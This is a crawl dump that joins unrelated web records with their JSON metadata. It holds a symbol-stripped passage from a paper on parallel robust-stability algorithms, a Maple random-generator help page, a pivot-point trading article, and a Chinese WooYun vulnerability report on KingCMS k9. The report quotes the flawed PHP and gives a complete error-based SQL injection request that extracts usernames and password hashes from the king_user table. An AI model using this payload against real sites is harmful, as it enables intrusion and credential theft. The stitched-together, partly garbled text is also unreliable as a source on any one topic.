Elements\n\nA semi-definite programming problem can be stated either in primal or dual format. Given , and , the primal problem is of the form\n\n maxXtr(CX)\n subject toa−B(X)=0\n X⪰0, (28)\n\nwhere the linear operator is defined as\n\n B(X)=[tr(B1X)tr(B2X)⋯tr(BKX)]T. (29)\n\nis the primal variable. Given a primal SDP, the associated dual problem is\n\n miny,ZaTy\n subject toBT(y)−C=Z\n Z⪰0,y∈RK, (30)\n\nwhere is the transpose operator and is given by\n\n BT(y)=K∑i=1yiBi (31)\n\nand where and are the dual variables. The elements , and of the SDP problem associated with the LMIs in (15) and (16) are defined as follows. We define the element as\n\n C:=diag(C1,⋯CL,CL+1,⋯CL+M), (32)\n\nwhere\n\n Ci:={δIn⋅(∑h∈Wdpβ⟨h⟩,idp!h1!⋯hl!),1≤i≤L0n,L+1≤i≤L+M, (33)\n\nwhere recall that is the number of monomials in , is the number of monomials in , where is the dimension of system (6), is the number of uncertain parameters and is a small positive parameter.\n\nFor , define elements as\n\n Bi:=diag(Bi,1,⋯Bi,L,Bi,L+1,⋯Bi,L+M), (34)\n\nwhere is the number of dual variables in (30) and is equal to the product of the number of upper-triangular elements in each (the coefficients in ) and the number of coefficients in (i.e. the cardinality of ). Since there are coefficients in and each coefficient has upper-triangular elements, we find\n\n K=(dp+l−1)!dp!(l−1)!~N. (35)\n\nTo define the blocks, first we define the function ,\n\n V⟨h⟩(x):=~N∑j=1Ejxj+~N(⟨h⟩−1)for allh∈Wdp, (36)\n\nwhich maps each variable to a basis matrix , where recall that is the basis for . Note that a different choice of basis would require a different function . Then for ,\n\n Bi,j:= ⎧⎪ ⎪ ⎪ ⎪⎨⎪ ⎪ ⎪ ⎪⎩∑h∈Wdpβ⟨h⟩,jV⟨h⟩(ei),1≤j≤L(I)−∑h∈Wdp(HT⟨h⟩,j−LV⟨h⟩(ei)+V⟨h⟩(ei)H⟨h⟩,j−L),L+1≤j≤L+M.(II) (37)\n\nFinally, to complete the SDP problem associated with Polya’s algorithm set\n\n a=→1∈RK. (38)\n\n### Iii-C Parallel Set-up Algorithm\n\nIn this section, we propose a decentralized, iterative algorithm for calculating the terms , , and as defined in (22), (24), (32) and (34). The algorithm has been implemented in C++, using MPI (Message Passing Interface) and is available at: www.sites.google.com/a/asu.edu/kamyar/software. We present an abridged description of this algorithm in Algorithm 1, wherein is the number of available processors.\n\nNote that we have only addressed the problem of robust stability analysis, using the polynomial inequality\n\n P(α)≻0,AT(α)P(α)+P(α)A(α)≺0\n\nfor . However, we can generalize the decentralized set-up algorithm to consider a more general class of feasibility problems, i.e.,\n\n ^N∑i=1(~Ai(α)~X(α)~Bi(α)+~BTi(α)~X(α)~ATi(α)+Ri(α))≺0 (41)\n\nfor . One motivation behind the development of such generalized set-up algorithm is that the parameter-dependent versions of the LMIs associated with and synthesis problems in [42, 43] can be formulated in the form of (41).\n\n### Iii-D Set-up algorithm: Complexity Analysis\n\nSince checking the positive definiteness of all representatives of a square matrix with parameters on proper real intervals is intractable , the question of feasibility of (9) is also intractable. To solve the problem of inherent intractability we establish a trade off between accuracy and complexity. In fact, we develop a sequence of decentralized polynomial-time algorithms whose solutions converge to the exact solution of the NP-hard problem. In other words, the translation of a polynomial optimization problem to an LMI problem is the main source of complexity. This high complexity is unavoidable and, in fact, is the reason we seek parallel algorithms.\n\nAlgorithm 1 distributes the computation and storage of and among the processors and their dedicated memories, respectively. In an ideal case, where the number of available processors is sufficiently large (equal to the number of monomials in , i.e. ) only one monomial ( of and of ) are assigned to each processor.\n\n1) Computational complexity analysis: The most computationally expensive part of the set-up algorithm is the calculation of the blocks in (37). Considering that the cost of matrix-matrix multiplication is , the cost of calculating each block is According to (34) and (37), the total number of blocks is . Hence, as per Algorithm 1, each processor processes of the blocks, where is the number of available processors. Thus the per processor computational cost of calculating the at each Polya’s iteration is\n\n ∼card(Wdp)⋅n3⋅K(floor(LN)+floor(MN)). (42)\n\nBy substituting for from (35), card from (25), from (26) and from (27), the per processor computation cost at each iteration is\n\n ∼((dp+l−1)!dp!(l−1)!)2n42(n+1)⎛⎜ ⎜ ⎜ ⎜ ⎜⎝floor⎛⎜ ⎜ ⎜ ⎜ ⎜⎝(dp+d1+l−1)!(dp+d1)!(l−1)!N⎞⎟ ⎟ ⎟ ⎟ ⎟⎠+floor⎛⎜ ⎜ ⎜ ⎜ ⎜⎝(dpa+d2+l−1)!(dpa+d2)!(l−1)!N⎞⎟ ⎟ ⎟ ⎟ ⎟⎠1212⎞⎟ ⎟ ⎟ ⎟ ⎟⎠ (43)\n\nassuming that and . For example, for the case of large-scale systems (large and ), the computation cost per processor at each iteration is having processors, having processors and having processors. Thus for the case where , the number of operations grows more slowly in than in .\n\n2) Communication complexity analysis: Communication between processors can be modeled by a directed graph , where the set of nodes is the set of indices of the available processors and the set of edges is the set of all pairs of processors that communicate with each other. For every directed graph we can define an adjacency matrix . If processor communicates with processor , then , otherwise . In this section, we only define the adjacency matrix for the part of the algorithm that performs Polya’s iterations on . For Polya’s iterations on , the adjacency matrix can be defined in a similar manner. For simplicity, we assume that at each iteration, the number of available processors is equal to the number of monomials in" ]
[ null, "https://storage.googleapis.com/groundai-web-prod/media/users/user_37453/project_46122/images/x1.png", null, "https://storage.googleapis.com/groundai-web-prod/media/users/user_37453/project_46122/images/x3.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9169218,"math_prob":0.98286325,"size":23526,"snap":"2020-45-2020-50","text_gpt3_token_len":4763,"char_repetition_ratio":0.15423858,"word_repetition_ratio":0.029086992,"special_character_ratio":0.20390207,"punctuation_ratio":0.09594986,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9982068,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-28T20:58:24Z\",\"WARC-Record-ID\":\"<urn:uuid:ba452263-408d-4fa4-8b34-3f7184028817>\",\"Content-Length\":\"1049303\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c66e3bdc-561c-4429-8606-b75413c33f53>\",\"WARC-Concurrent-To\":\"<urn:uuid:ff2a1233-dad8-4952-952a-1180752b2b29>\",\"WARC-IP-Address\":\"35.186.203.76\",\"WARC-Target-URI\":\"https://www.groundai.com/project/solving-large-scale-robust-stability-problems-by-exploiting-the-parallel-structure-of-polyas-theorem/\",\"WARC-Payload-Digest\":\"sha1:TJAGP5V54OPGRS72YB3K4ZC47HPRNTR7\",\"WARC-Block-Digest\":\"sha1:GZBSPLTP5DPQ557VI3OC2O6MMVIWNGF5\",\"WARC-Truncated\":\"length\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107900860.51_warc_CC-MAIN-20201028191655-20201028221655-00341.warc.gz\"}"}
https://fr.maplesoft.com/support/help/maplesim/view.aspx?path=RandomTools%2FLinearCongruence%2FNewGenerator
[ "", null, "NewGenerator - Maple Help\n\nRandomTools[LinearCongruence]\n\n NewGenerator\n Create a Linear Congruence Pseudo Random Number Generator", null, "Calling Sequence NewGenerator( opt1, opt2, ... )", null, "Parameters\n\n opt1, opt2, ... - (optional) argument of the form option=value where option is range", null, "Description\n\n • The NewGenerator command outputs a Maple procedure, a pseudo-random number generator, which when called outputs one pseudo-random integer. The output of the generator depends on the options described below. The default is to output integers on the range $0..999999999999$, i.e., a random 12 digit integer.\n • The returned procedure calls the LinearCongruence algorithm to generate the numbers.  Although you can have multiple generating procedures, they all share the same state.  This means that calling one procedure will effect the numbers returned by another.\n • The following optional arguments are supported. They are input as equations in any order.\n • range=integer..integer or integer\n If the value of the range argument is a range, then the integer will be chosen from that range.  If the value of the range argument is an integer, then the integer will be take from the range [0..value).  The default range is $1000000000000$.\n • If one only needs to generate a small number of integers then the GenerateInteger function can be used.  However, using a procedure returned by NewGenerator is faster than calling GenerateInteger multiple times.", null, "Examples\n\n > $\\mathrm{with}\\left(\\mathrm{RandomTools}\\left[\\mathrm{LinearCongruence}\\right]\\right)$\n $\\left[{\\mathrm{GenerateInteger}}{,}{\\mathrm{GetState}}{,}{\\mathrm{NewGenerator}}{,}{\\mathrm{SetState}}\\right]$ (1)\n > $M≔\\mathrm{NewGenerator}\\left(\\mathrm{range}=1..6\\right)$\n ${M}{≔}{\\mathbf{proc}}\\left({}\\right)\\phantom{\\rule[-0.0ex]{0.5em}{0.0ex}}{\\mathrm{LinearCongruence}}{:-}{\\mathrm{LCState}}{≔}{\\mathrm{irem}}{}\\left({427419669081}{*}{\\mathrm{LinearCongruence}}{:-}{\\mathrm{LCState}}{,}{999999999989}\\right){;}\\phantom{\\rule[-0.0ex]{0.5em}{0.0ex}}{\\mathrm{irem}}{}\\left({\\mathrm{LinearCongruence}}{:-}{\\mathrm{LCState}}{,}{6}\\right){+}{1}\\phantom{\\rule[-0.0ex]{0.5em}{0.0ex}}{\\mathbf{end proc}}$ (2)\n > $M\\left(\\right)$\n ${4}$ (3)\n > $\\mathrm{seq}\\left(M\\left(\\right),i=1..10\\right)$\n ${3}{,}{4}{,}{6}{,}{5}{,}{3}{,}{6}{,}{3}{,}{2}{,}{2}{,}{2}$ (4)\n > $M≔\\mathrm{NewGenerator}\\left(\\mathrm{range}={10}^{10}\\right)$\n ${M}{≔}{\\mathbf{proc}}\\left({}\\right)\\phantom{\\rule[-0.0ex]{0.5em}{0.0ex}}{\\mathrm{LinearCongruence}}{:-}{\\mathrm{LCState}}{≔}{\\mathrm{irem}}{}\\left({427419669081}{*}{\\mathrm{LinearCongruence}}{:-}{\\mathrm{LCState}}{,}{999999999989}\\right){;}\\phantom{\\rule[-0.0ex]{0.5em}{0.0ex}}{\\mathrm{irem}}{}\\left({\\mathrm{LinearCongruence}}{:-}{\\mathrm{LCState}}{,}{10000000000}\\right)\\phantom{\\rule[-0.0ex]{0.5em}{0.0ex}}{\\mathbf{end proc}}$ (5)\n > $M\\left(\\right)$\n ${75487163}$ (6)\n > $\\mathrm{seq}\\left(M\\left(\\right),i=1..5\\right)$\n ${7179490457}{,}{9169594160}{,}{8430571674}{,}{498834085}{,}{2920457916}$ (7)\n > $\\mathrm{Float}\\left(M\\left(\\right),-10\\right)$\n ${0.3747019461}$ (8)\n > $\\mathrm{seq}\\left(\\mathrm{Float}\\left(M\\left(\\right),-10\\right),i=1..5\\right)$\n ${0.4031395307}{,}{0.0624947349}{,}{0.1053530086}{,}{0.6486307198}{,}{0.5590763466}$ (9)\n > $M≔\\mathrm{NewGenerator}\\left(\\mathrm{range}={10}^{32}\\right)$\n ${M}{≔}{\\mathbf{proc}}\\left({}\\right)\\phantom{\\rule[-0.0ex]{0.5em}{0.0ex}}{\\mathbf{local}}\\phantom{\\rule[-0.0ex]{0.5em}{0.0ex}}{t}{;}\\phantom{\\rule[-0.0ex]{0.5em}{0.0ex}}{\\mathrm{LinearCongruence}}{:-}{\\mathrm{LCState}}{≔}{\\mathrm{irem}}{}\\left({427419669081}{*}{\\mathrm{LinearCongruence}}{:-}{\\mathrm{LCState}}{,}{999999999989}\\right){;}\\phantom{\\rule[-0.0ex]{0.5em}{0.0ex}}{t}{≔}{\\mathrm{LinearCongruence}}{:-}{\\mathrm{LCState}}{;}\\phantom{\\rule[-0.0ex]{0.5em}{0.0ex}}{\\mathbf{to}}\\phantom{\\rule[-0.0ex]{0.5em}{0.0ex}}{2}\\phantom{\\rule[-0.0ex]{0.5em}{0.0ex}}{\\mathbf{do}}\\phantom{\\rule[-0.0ex]{0.5em}{0.0ex}}{\\mathrm{LinearCongruence}}{:-}{\\mathrm{LCState}}{≔}{\\mathrm{irem}}{}\\left({427419669081}{*}{\\mathrm{LinearCongruence}}{:-}{\\mathrm{LCState}}{,}{999999999989}\\right){;}\\phantom{\\rule[-0.0ex]{0.5em}{0.0ex}}{t}{≔}{1000000000000}{*}{t}{+}{\\mathrm{LinearCongruence}}{:-}{\\mathrm{LCState}}\\phantom{\\rule[-0.0ex]{0.5em}{0.0ex}}{\\mathbf{end do}}{;}\\phantom{\\rule[-0.0ex]{0.5em}{0.0ex}}{\\mathrm{irem}}{}\\left({t}{,}{100000000000000000000000000000000}\\right)\\phantom{\\rule[-0.0ex]{0.5em}{0.0ex}}{\\mathbf{end proc}}$ (10)\n > $M\\left(\\right)$\n ${92673709525428510973272600608981}$ (11)" ]
[ null, "https://bat.bing.com/action/0", null, "https://fr.maplesoft.com/support/help/maplesim/arrow_down.gif", null, "https://fr.maplesoft.com/support/help/maplesim/arrow_down.gif", null, "https://fr.maplesoft.com/support/help/maplesim/arrow_down.gif", null, "https://fr.maplesoft.com/support/help/maplesim/arrow_down.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.69996977,"math_prob":0.9998485,"size":2595,"snap":"2022-05-2022-21","text_gpt3_token_len":781,"char_repetition_ratio":0.22269394,"word_repetition_ratio":0.037593983,"special_character_ratio":0.30751446,"punctuation_ratio":0.2248394,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99738276,"pos_list":[0,1,2,3,4,5,6,7,8,9,10],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-01-22T00:02:07Z\",\"WARC-Record-ID\":\"<urn:uuid:08831d1c-337d-4f13-9fde-d12e19a6e246>\",\"Content-Length\":\"245937\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:74f89f74-080a-459a-b7b7-6d630b9e2fd8>\",\"WARC-Concurrent-To\":\"<urn:uuid:f46c306f-627c-45fd-bed4-7adfcedfd2fc>\",\"WARC-IP-Address\":\"199.71.183.28\",\"WARC-Target-URI\":\"https://fr.maplesoft.com/support/help/maplesim/view.aspx?path=RandomTools%2FLinearCongruence%2FNewGenerator\",\"WARC-Payload-Digest\":\"sha1:NNO5GXBYWRCXEPEJSKP3W7OVUGMS2L67\",\"WARC-Block-Digest\":\"sha1:UDJ6DBZFNW2EKFKPWAXSYYVFC64KPKXF\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-05/CC-MAIN-2022-05_segments_1642320303717.35_warc_CC-MAIN-20220121222643-20220122012643-00645.warc.gz\"}"}
https://futures.io/articles/trading/Floor-Trader-Pivots?s=4b12905d35f6bc4b5e08efd5f8f78027&redirect=no
[ "", null, "Floor Trader Pivots - futures io", null, "", null, "Pivot Points are also know as Floor Trader Pivots (or Pivots or Floor Pivots or Session Pivots). These are the places where traders expect support and resistance to occur in the market and as such are used as entry and exit points for trades.\n\nDepending on the type of pivot formula used you can generally generate and use up to 9 levels. These levels are marked and calculated by starting with a center pivot called a Pivot Point and labeled as PP. From that point, moving up, the resistance levels are numbered sequentially as R1, R2, R3, R4 with R4 being the highest value. The support levels are numbered in the same way S1, S2, S3, S4 with S4 being the lowest support value.\n\nA trader needs to decide if they will calculate their Pivots based on ETH or RTH, the later could be argued to match more closely the time period used by floor traders (who developed Floor Trader Pivots before the advent of computers) and may therefore be more representative of those still calculating pivots. However it needs to be remembered that from 2015 there are basically (with one exception) no floor trading pits anymore when it comes to futures trading.\n\nNowdays with computers VWAP and Volume Profiling (VPOC, VAH and VAL etc) are arguably a better way to calculate and look at typical/average price.\n\nThere are a number of ways to calculate pivots points. Here are some of the more popular methods: Classic Pivot Points, Camarilla Pivot Points, DeMark Pivot Points, Woodie Pivot Points.\n\nThe formula used in the calculation of Classic Pivot Points are:\n\nR4 = R3 + RANGE (same as: PP + RANGE * 3)\nR3 = R2 + RANGE (same as: PP + RANGE * 2)\nR2 = PP + RANGE\nR1 = (2 * PP) - LOW\nPP = (HIGH + LOW + CLOSE) / 3\nS1 = (2 * PP) - HIGH\nS2 = PP - RANGE\nS3 = S2 - RANGE (same as: PP - RANGE * 2)\nS4 = S3 - RANGE (same as: PP - RANGE * 3)\n\nWhere R1 through R4 are Resistance levels 1 to 4, PP is the Pivot Point, S1 through S4 are support levels 1 to 4, RANGE is the High minus the Low for the given time frame (usually daily).\n\nThe formula used in the calculation of Camarilla Pivot Points are:\n\nR4 = C + RANGE * 1.1/2\nR3 = C + RANGE * 1.1/4\nR2 = C + RANGE * 1.1/6\nR1 = C + RANGE * 1.1/12\nPP = (HIGH + LOW + CLOSE) / 3\nS1 = C - RANGE * 1.1/12\nS2 = C - RANGE * 1.1/6\nS3 = C - RANGE * 1.1/4\nS4 = C - RANGE * 1.1/2\n\nWhere R1 through R4 are Resistance levels 1 to 4, PP is the Pivot Point, S1 through S4 are support levels 1 to 4, RANGE is the High minus the Low for the given time frame (usually daily). C stands for the Closing price.\n\nThe formula used in the calculation of Woodie Pivot Points are:\n\nR4 = R3 + RANGE\nR3 = H + 2 * (PP - L) (same as: R1 + RANGE)\nR2 = PP + RANGE\nR1 = (2 * PP) - LOW\nPP = (HIGH + LOW + (TODAY'S OPEN * 2)) / 4\nS1 = (2 * PP) - HIGH\nS2 = PP - RANGE\nS3 = L - 2 * (H - PP) (same as: S1 - RANGE)\nS4 = S3 - RANGE\n\nWhere R1 through R4 are Resistance levels 1 to 4, PP is the Pivot Point, S1 through S4 are support levels 1 to 4, RANGE is the High minus the Low for the given time frame (usually daily).\n\nOne of the key differences in calculating Woodie's Pivot Point to other pivot points is that the current session's open price is used in the PP formula with the previous session's high and low. At the time-of-day that we calculate the pivot points on this site in our Daily Notes we do not have the opening price so we use the Classic formula for the Pivot Point and vary the R3 and R4 formula as per Woodie's formulas.\n\n[significant sections sourced from: https://www.mypivots.com/dictionary/definition/155/pivot-points]\n\n Copyright © 2021 by futures io, s.a., Av Ricardo J. Alfaro, Century Tower, Panama, +507 833-9432, [email protected] All information is for educational use only and is not investment advice.There is a substantial risk of loss in trading commodity futures, stocks, options and foreign exchange products. Past performance is not indicative of future results." ]
[ null, "https://www.facebook.com/tr", null, "https://futures.io/styles/fio/fio_logo.svg", null, "https://tradingview.go2cloud.org/aff_i", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.87626797,"math_prob":0.9889052,"size":3513,"snap":"2021-04-2021-17","text_gpt3_token_len":1019,"char_repetition_ratio":0.15246509,"word_repetition_ratio":0.29014084,"special_character_ratio":0.29832053,"punctuation_ratio":0.085434176,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9895883,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-01-20T13:18:16Z\",\"WARC-Record-ID\":\"<urn:uuid:42c02a14-23a4-4e1e-b5ba-85ea75672126>\",\"Content-Length\":\"51099\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:05552409-8c3b-482b-92c1-b4696a63fa94>\",\"WARC-Concurrent-To\":\"<urn:uuid:9238555e-1b55-4458-b751-6963105f18a5>\",\"WARC-IP-Address\":\"216.18.214.170\",\"WARC-Target-URI\":\"https://futures.io/articles/trading/Floor-Trader-Pivots?s=4b12905d35f6bc4b5e08efd5f8f78027&redirect=no\",\"WARC-Payload-Digest\":\"sha1:AMHCDUEI6CSXJ6UZ3RFWQINOZ5BGLALZ\",\"WARC-Block-Digest\":\"sha1:K6ZVM3DD6CX2UQFM7UVHCHD37GUWM7EN\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-04/CC-MAIN-2021-04_segments_1610703520883.15_warc_CC-MAIN-20210120120242-20210120150242-00763.warc.gz\"}"}
https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0102490
[ " KingCms最新版(k9)注入3枚打包 | wooyun-2015-0102490| WooYun.org\n\n## 漏洞详情\n\n### 披露状态:\n\n2015-03-20: 积极联系厂商并且等待厂商认领中,细节不对外公开\n2015-05-04: 厂商已经主动忽略漏洞,细节向公众公开\n\n### 简要描述:\n\nKingCms最新版(k9)注入3枚打包\n\n### 详细说明:\n\n``function _create(){\t\\$u=new user;\\$u->auth_role('store');\t\\$db=new db;\t\\$where=kc_get('where',0,1);\t\\$pid=kc_get('pid',2,1);\t\\$rn=kc_get('rn',2,1);\t\\$limit=(\\$rn*(\\$pid-1)).','.\\$rn.';';\t\\$cmd=kc_get('cmd',array('categroy','store','news','product'));\t\\$pcount=kc_get('pcount',2,1);\t\\$start=\\$rn*\\$pid>\\$pcount?\\$pcount:\\$rn*\\$pid;\t\\$file=new file;\t\\$fpath=kc_config('store.url');\tif(\\$cmd=='categroy'){\t\t\\$res=\\$db->getRows('%s_store_categroy','*');\t\tforeach(\\$res as \\$rs){\t\t\t\\$rs['TEMPLATE']='store/'.(empty(\\$rs['template'])?'categroy.php':\\$rs['template']);\t\t\t\\$file->create(\\$rs['url'],\\$rs);\t\t}\t}else if(\\$cmd=='store'){\t\t\\$sids=\\$db->getRows_two('%s_store','sid','sid',\\$where,'',\\$limit);\t\t\\$store=new store;\t\t\\$store->create(\\$sids);\t}else if(\\$cmd=='news'){\t\t\\$res=\\$db->getRows('%s_store_news','*',\\$where,'',\\$limit);\t\t\\$store_urls=array();\t\tforeach(\\$res as \\$rs){\t\t\tif(empty(\\$store_urls[\\$rs['sid']])){\t\t\t\t\\$store=\\$db->getRows_one('%s_store','url','sid='.\\$rs['sid']);\t\t\t\tif(empty(\\$store)){\t\t\t\t\t\\$db->delete('%s_store_news','sid='.\\$sid);\t\t\t\t\tkc_tip('所属店铺数据丢失,已删除对应数据,请重新生成!','form');\t\t\t\t}\t\t\t\t\\$store_urls[\\$rs['sid']]=\\$store['url'];\t\t\t}\t\t\t\\$url=\\$store_urls[\\$rs['sid']];\t\t\t\t\t\t\\$rs['tmpfile']='news.page.php';\t\t\t\\$file->create(\\$url.'news/n'.\\$rs['id'].'/',\\$rs,\\$url.'config.php');\t\t}\t}else if(\\$cmd=='product'){\t\t\\$res=\\$db->getRows('%s_store_product','*',\\$where,'',\\$limit);\t\t\\$store_urls=array();\t\tforeach(\\$res as \\$rs){\t\t\tif(empty(\\$store_urls[\\$rs['sid']])){\t\t\t\t\\$store=\\$db->getRows_one('%s_store','url','sid='.\\$rs['sid']);\t\t\t\tif(empty(\\$store)){\t\t\t\t\t\\$db->delete('%s_store_product','sid='.\\$sid);\t\t\t\t\tkc_tip('所属店铺数据丢失,已删除对应数据,请重新生成!','form');\t\t\t\t}\t\t\t\t\\$store_urls[\\$rs['sid']]=\\$store['url'];\t\t\t}\t\t\t\\$url=\\$store_urls[\\$rs['sid']];\t\t\t\t\t\t\\$rs['tmpfile']='product.page.php';\t\t\t\\$file->create(\\$url.'product/n'.\\$rs['id'].'/',\\$rs,\\$url.'config.php');\t\t}\t}\t\t\\$js=\"\\\\$.kc_progress('#progress_{\\$cmd}',{\\$start},{\\$pcount});\";\t\\$js.=\\$start==\\$pcount ? \"\\\\$('.Submit').removeAttr('disabled');\":\"\\\\$.kc_ajax({URL:'\".FULLURL.\"apps/store/index.php',CMD:'create',cmd:'\\$cmd',where:'\\$where',pid:\".(\\$pid+1).\",rn:{\\$rn},pcount:{\\$pcount}});\";\tkc_ajax(array('JS'=>\\$js));}``\n\n``function kc_validate(\\$s,\\$type){\t\\$reg='';\tswitch(\\$type){\t\tcase 1:\\$reg='/^[a-zA-Z0-9]+\\$/';break;\t\tcase 2:\\$reg='/^[0-9]+\\$/';break;\t\tcase 3:\\$reg='/^([0-9]+,)*[0-9]+\\$/';break;\t\tcase 4:\\$reg='/^[A-Za-z0-9\\_]+\\$/';break;\t\tcase 5:\t\t\t\\$reg='/^\\w+([-+.]\\w+)*@\\w+([-.]\\w+)*\\.\\w+([-.]\\w+)*\\$/';break;\t\tcase 6:\t\t\t\\$reg='/^[a-zA-Z]{3,10}:\\/\\/[^\\s]+\\$/';\t\t\tbreak;\t\tcase 7:\t\t\t\\$reg='/^([a-zA-Z]{3,10}:\\/\\/)?[^\\s]+\\.(jpeg|jpg|gif|png|bmp)\\$/';\t\t\tbreak;\t\tcase 8:\t\t\t\\$reg='/^((((1[6-9]|[2-9]\\d)\\d{2})-(0?|1)-(0?[1-9]|\\d|3))|(((1[6-9]|[2-9]\\d)\\d{2})-(0?|1)-(0?[1-9]|\\d|30))|(((1[6-9]|[2-9]\\d)\\d{2})-0?2-(0?[1-9]|1\\d|2[0-8]))|(((1[6-9]|[2-9]\\d)(0||)|((16||)00))-0?2-29)) (20|21|22|23|[0-1]?\\d):[0-5]?\\d:[0-5]?\\d\\$/';\t\t\tbreak;\t\tcase 9:\t\t\t\\$reg='/^((((1[6-9]|[2-9]\\d)\\d{2})-(0?|1)-(0?[1-9]|\\d|3))|(((1[6-9]|[2-9]\\d)\\d{2})-(0?|1)-(0?[1-9]|\\d|30))|(((1[6-9]|[2-9]\\d)\\d{2})-0?2-(0?[1-9]|1\\d|2[0-8]))|(((1[6-9]|[2-9]\\d)(0||)|((16||)00))-0?2-29))\\$/';\t\t\tbreak;\t\tcase 10:\\$reg='/^\\d?\\.\\d?\\.\\d{4}\\$/';break;\t\tcase 11:\\$reg='/^((2[0-4]\\d|25[0-5]|?\\d\\d?)\\.){3}(2[0-4]\\d|25[0-5]|?\\d\\d?)\\$/';break;\t\tcase 12:\\$reg='/^(\\d+(\\.\\d+)?)\\$/';break;\t\tcase 13:\\$reg='/^([0-9A-Za-z]+,)*[0-9A-Za-z]+\\$/';break;\t\tcase 14:\\$reg='/^#?[0-9A-Fa-f]{6}\\$/';break;\t\tcase 15:\\$reg='/^([a-zA-Z0-9\\_\\-]+\\/)+\\$/';\t\t\t\\$s=preg_replace('/\\{([a-zA-Z0-9]+)\\}/','\\$1',\\$s);//替换{ID}等类型为ID\t\t\t\\$path=preg_replace('/(([a-zA-Z0-9\\_\\-]+\\/)*)([a-zA-Z0-9\\_\\-]+\\/)/','\\$3',\\$s);\t\t\t//kc_tip(\\$path,'form');\t\t\t//if(preg_match('/^[pP]\\d+\\$/',\\$path)){return false;}\t\t\tbreak;\t\tcase 17:\\$reg='/^([a-zA-Z]{3,10}:\\/\\/)[^\\s]+\\$/';break;\t\tcase 18:\t\t\t\\$reg='/^((((1[6-9]|[2-9]\\d)\\d{2})-(0?|1)-(0?[1-9]|\\d|3))|(((1[6-9]|[2-9]\\d)\\d{2})-(0?|1)-(0?[1-9]|\\d|30))|(((1[6-9]|[2-9]\\d)\\d{2})-0?2-(0?[1-9]|1\\d|2[0-8]))|(((1[6-9]|[2-9]\\d)(0||)|((16||)00))-0?2-29)) (20|21|22|23|[0-1]?\\d):[0-5]?\\d\\$/';\t\t\tbreak;\t\tcase 22:\\$reg='/^(\\-|\\+)?[0-9]+\\$/';break;\t\tcase 23:\\$reg='/^[a-zA-Z][a-zA-Z0-9\\_]*/';break;\t\tcase 24:\\$reg='/^([a-zA-Z0-9\\-_]+\\/)+\\$/';break;\t\tcase 25:\\$reg='/[a-zA-Z0-9\\+\\%]+(\\=)*\\$/';break;\t\tcase 33:\\$reg='/^(\\-?[0-9]+\\,?)+\\$/';break;\t\tcase 34:\\$reg=\"/^[^\\s!-\\/:[email protected]\\[-`\\{-~]+\\$/\";break;\t\tdefault:\\$reg=\\$type;break;\t}\t//如果为数组类型\tif (is_array(\\$reg)) {\t\t\\$bool=in_array(\\$s,\\$reg);\t}else{\t\t\\$bool= empty(\\$type)\t\t\t? true\t\t\t: (empty(\\$reg) ? false : (bool)preg_match(\\$reg,\\$s));\t}\treturn \\$bool;}``\n\n\\$_POST['where']进入\\$db->getRows,去看看\\$db->getRows\n\n``public function getRows(\\$table,\\$insql='*',\\$where=null,\\$order=null,\\$limit=null,\\$group=null) {\t\t\\$table=str_replace('%s',DB_PRE,\\$table);\t\t\\$sql=\"SELECT \\$insql FROM \\$table \";\t\t\\$sql.= empty(\\$where) ? '' : \" WHERE \\$where\";\t\t\\$sql.= empty(\\$group) ? '' : \" GROUP BY \\$group\";\t\t\\$sql.= empty(\\$order) ? '' : \" ORDER BY \\$order\";\t\t\\$sql.= empty(\\$limit) ? '' : \" LIMIT \\$limit\";\t\treturn \\$this->get(\\$sql);\t}``\n\nKingcms可以报错,因此\n\n``jsoncallback=1&_=11&URL=http%3A%2F%2Flocalhost%2Fapps%2Fcontent%2Fcategroy.php&CMD=create&TID=1&AJAX=1&USERID=10000&SIGN=89ee81f5f1f328f555ceb7e7655d9f2f&pid=1&rn=2&cmd=content&pcount=1&where=0 UNION SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x23,(SELECT concat(username,0x23,userpass)FROM king_user LIMIT 0,1),0x23,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.tables GROUP BY x)a%23``", null, "" ]
[ null, "http://wimg.zone.ci/upload/201503/19235858e4b1db7fe86037ec664f830d547b386c.jpg", null ]
